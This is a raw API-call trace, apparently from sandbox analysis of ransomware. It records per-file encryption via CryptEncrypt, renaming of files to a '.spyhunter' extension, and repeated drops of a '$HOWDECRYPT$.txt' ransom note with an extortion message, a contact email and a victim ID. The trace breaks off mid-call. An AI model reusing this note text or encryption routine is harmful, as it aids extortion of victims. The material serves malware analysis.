(lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.863] GetProcessHeap () returned 0x2c0000 [0146.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0146.863] GetProcessHeap () returned 0x2c0000 [0146.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f68240 | out: hHeap=0x2c0000) returned 1 [0146.863] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cee30 | out: pbBuffer=0x25cee30) returned 1 [0146.863] GetProcessHeap () returned 0x2c0000 [0146.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0146.863] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cee28*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cee28*=0x30) returned 1 [0146.863] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.864] GetProcessHeap () returned 0x2c0000 [0146.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0146.864] GetProcessHeap () returned 0x2c0000 [0146.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc1520 | out: hHeap=0x2c0000) returned 1 [0146.864] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cee30 | out: pbBuffer=0x25cee30) returned 1 [0146.864] GetProcessHeap () returned 0x2c0000 [0146.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0146.864] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cee28*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cee28*=0x30) returned 1 [0146.864] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.864] GetProcessHeap () returned 0x2c0000 [0146.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0146.864] GetProcessHeap () returned 0x2c0000 [0146.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc13f8 | out: hHeap=0x2c0000) returned 1 [0146.864] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\crypto\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0146.865] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0146.865] WriteFile (in: hFile=0x178, lpBuffer=0x25ced5f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cee88, lpOverlapped=0x0 | out: lpBuffer=0x25ced5f*, lpNumberOfBytesWritten=0x25cee88*=0x127, lpOverlapped=0x0) returned 1 [0146.866] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0146.866] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cee88, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cee88*=0x2ac, lpOverlapped=0x0) returned 1 [0146.866] CloseHandle (hObject=0x178) returned 1 [0146.866] GetProcessHeap () returned 0x2c0000 [0146.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2e5f8 | out: hHeap=0x2c0000) returned 1 [0146.866] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0146.867] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0146.867] WriteFile (in: hFile=0x178, lpBuffer=0x25ced5b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cee84, lpOverlapped=0x0 | out: lpBuffer=0x25ced5b*, lpNumberOfBytesWritten=0x25cee84*=0x127, lpOverlapped=0x0) returned 1 [0146.867] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0146.867] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cee84, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cee84*=0x2ac, lpOverlapped=0x0) returned 1 [0146.868] CloseHandle (hObject=0x178) returned 1 [0146.868] GetProcessHeap () returned 0x2c0000 [0146.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x302fd68 | out: hHeap=0x2c0000) returned 1 [0146.868] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.042] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0147.042] WriteFile (in: hFile=0xa0, lpBuffer=0x25ced57*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cee80, lpOverlapped=0x0 | out: lpBuffer=0x25ced57*, lpNumberOfBytesWritten=0x25cee80*=0x127, lpOverlapped=0x0) returned 1 [0147.043] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0147.043] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cee80, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cee80*=0x2ac, lpOverlapped=0x0) returned 1 [0147.043] CloseHandle (hObject=0xa0) returned 1 [0147.043] GetProcessHeap () returned 0x2c0000 [0147.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2feec68 | out: hHeap=0x2c0000) returned 1 [0147.043] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cee20 | out: pbBuffer=0x25cee20) returned 1 [0147.043] GetProcessHeap () returned 0x2c0000 [0147.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0147.043] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cee18*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cee18*=0x30) returned 1 [0147.043] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.h1d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0147.055] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D") returned 80 [0147.055] StrStrW (lpFirst="Help_MValidator.H1D", lpSrch=".txt") returned 0x0 [0147.055] GetProcessHeap () returned 0x2c0000 [0147.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0147.055] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ceddc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ceddc*=0x2800, lpOverlapped=0x0) returned 1 [0147.092] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.092] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ceddc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ceddc*=0x2800, lpOverlapped=0x0) returned 1 [0147.092] GetProcessHeap () returned 0x2c0000 [0147.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0147.093] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.093] WriteFile (in: hFile=0xb0, lpBuffer=0x25cee1c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ceddc, lpOverlapped=0x0 | out: lpBuffer=0x25cee1c*, lpNumberOfBytesWritten=0x25ceddc*=0x4, lpOverlapped=0x0) returned 1 [0147.117] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ceddc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ceddc*=0x30, lpOverlapped=0x0) returned 1 [0147.117] CloseHandle (hObject=0xb0) returned 1 [0147.117] GetProcessHeap () returned 0x2c0000 [0147.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.118] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D.spyhunter") returned 90 [0147.118] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.h1d"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.h1d.spyhunter")) returned 1 [0147.118] GetProcessHeap () returned 0x2c0000 [0147.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.118] GetProcessHeap () returned 0x2c0000 [0147.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0147.118] GetProcessHeap () returned 0x2c0000 [0147.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f64e48 | out: hHeap=0x2c0000) returned 1 [0147.119] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cee18 | out: pbBuffer=0x25cee18) returned 1 [0147.119] GetProcessHeap () returned 0x2c0000 [0147.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0147.119] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cee10*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cee10*=0x30) returned 1 [0147.119] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\.." (normalized: "c:\\users\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0147.119] GetProcessHeap () returned 0x2c0000 [0147.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0147.119] GetProcessHeap () returned 0x2c0000 [0147.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30e658 | out: hHeap=0x2c0000) returned 1 [0147.119] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cee18 | out: pbBuffer=0x25cee18) returned 1 [0147.119] GetProcessHeap () returned 0x2c0000 [0147.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0147.119] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cee10*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cee10*=0x30) returned 1 [0147.119] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\." (normalized: "c:\\users\\all users\\microsoft\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0147.119] GetProcessHeap () returned 0x2c0000 [0147.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0147.119] GetProcessHeap () returned 0x2c0000 [0147.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30e5c8 | out: hHeap=0x2c0000) returned 1 [0147.120] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\adobe\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0147.120] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0147.120] WriteFile (in: hFile=0xb0, lpBuffer=0x25ced47*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cee70, lpOverlapped=0x0 | out: lpBuffer=0x25ced47*, lpNumberOfBytesWritten=0x25cee70*=0x127, lpOverlapped=0x0) returned 1 [0147.121] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0147.121] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cee70, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cee70*=0x2ac, lpOverlapped=0x0) returned 1 [0147.121] CloseHandle (hObject=0xb0) returned 1 [0147.121] GetProcessHeap () returned 0x2c0000 [0147.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33e6f8 | out: hHeap=0x2c0000) returned 1 [0147.122] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\adobe\\arm\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0147.122] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0147.122] WriteFile (in: hFile=0xb0, lpBuffer=0x25ced43*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cee6c, lpOverlapped=0x0 | out: lpBuffer=0x25ced43*, lpNumberOfBytesWritten=0x25cee6c*=0x127, lpOverlapped=0x0) returned 1 [0147.123] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0147.123] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cee6c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cee6c*=0x2ac, lpOverlapped=0x0) returned 1 [0147.123] CloseHandle (hObject=0xb0) returned 1 [0147.123] GetProcessHeap () returned 0x2c0000 [0147.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebff30 | out: hHeap=0x2c0000) returned 1 [0147.123] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0147.125] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0147.125] WriteFile (in: hFile=0xb0, lpBuffer=0x25ced3f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cee68, lpOverlapped=0x0 | out: lpBuffer=0x25ced3f*, lpNumberOfBytesWritten=0x25cee68*=0x127, lpOverlapped=0x0) returned 1 [0147.125] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0147.125] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cee68, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cee68*=0x2ac, lpOverlapped=0x0) returned 1 [0147.125] CloseHandle (hObject=0xb0) returned 1 [0147.126] GetProcessHeap () returned 0x2c0000 [0147.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x302fa48 | out: hHeap=0x2c0000) returned 1 [0147.126] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cee08 | out: pbBuffer=0x25cee08) returned 1 [0147.126] GetProcessHeap () returned 0x2c0000 [0147.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0147.126] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cee00*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cee00*=0x30) returned 1 [0147.126] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\adberdrupd10116_mui.msp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0147.131] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp") returned 70 [0147.131] StrStrW 